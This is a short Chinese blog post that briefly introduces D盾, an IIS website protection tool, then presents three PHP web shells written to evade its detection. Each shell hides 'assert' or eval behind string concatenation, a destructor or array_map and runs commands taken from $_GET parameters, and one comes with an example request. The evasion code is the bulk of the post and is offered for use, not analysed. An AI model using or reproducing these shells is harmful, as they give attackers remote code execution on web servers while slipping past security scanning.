目录

D盾简介

D盾安装

D盾的使用

D盾免杀 

 法一:

 法二:

 法三:


D盾简介

『D盾_防火墙』专为IIS设计的一个主动防御的保护软件,以内外保护的方式 防止网站和服务器给入侵,在正常运行各类网站的情 况下,越少的功能,服务器越安全的理念而设计! 限制了常见的入侵方法,让服务器更安全!

D盾安装

D盾官网下载

D盾的使用

D盾免杀 

 法一:

<?php

    class Chello{
        public function constructStr(){
            $a = 'ass';
            $b = 'ert';
            return $a.$b;
        }

        public function __construct($str){
            $this->name = $str;
        }

        public function __destruct(){
            // TODO: Implement __destruct() method.
            $temp = $this->constructStr();
            $temp($this->name);
        }
    }

    new Chello($_GET['cmd']);
    
?>

 法二:

<?php

    function test($a,$b){
        $arr = array(1,2,3,4,$b);
        array_map($a,$arr);
        // array_map():返回数组,是为array每个元素应用 callback() 函数之后的数组
    }

    test($_GET['data'],$_GET['cmd']);

?>


用法:?data=assert&cmd=phpinfo()

 法三:

<?php

    function cmd($x,$y){
        eval('$x (/**/$y);');
    }

    $a = "a";
    $b = "rgedit";
    $c = "ssert";
    $ret = /**/$a.$c;
    cmd($ret,$_GET['a']);

?>

 

 

 

Logo

助力合肥开发者学习交流的技术社区,不定期举办线上线下活动,欢迎大家的加入

更多推荐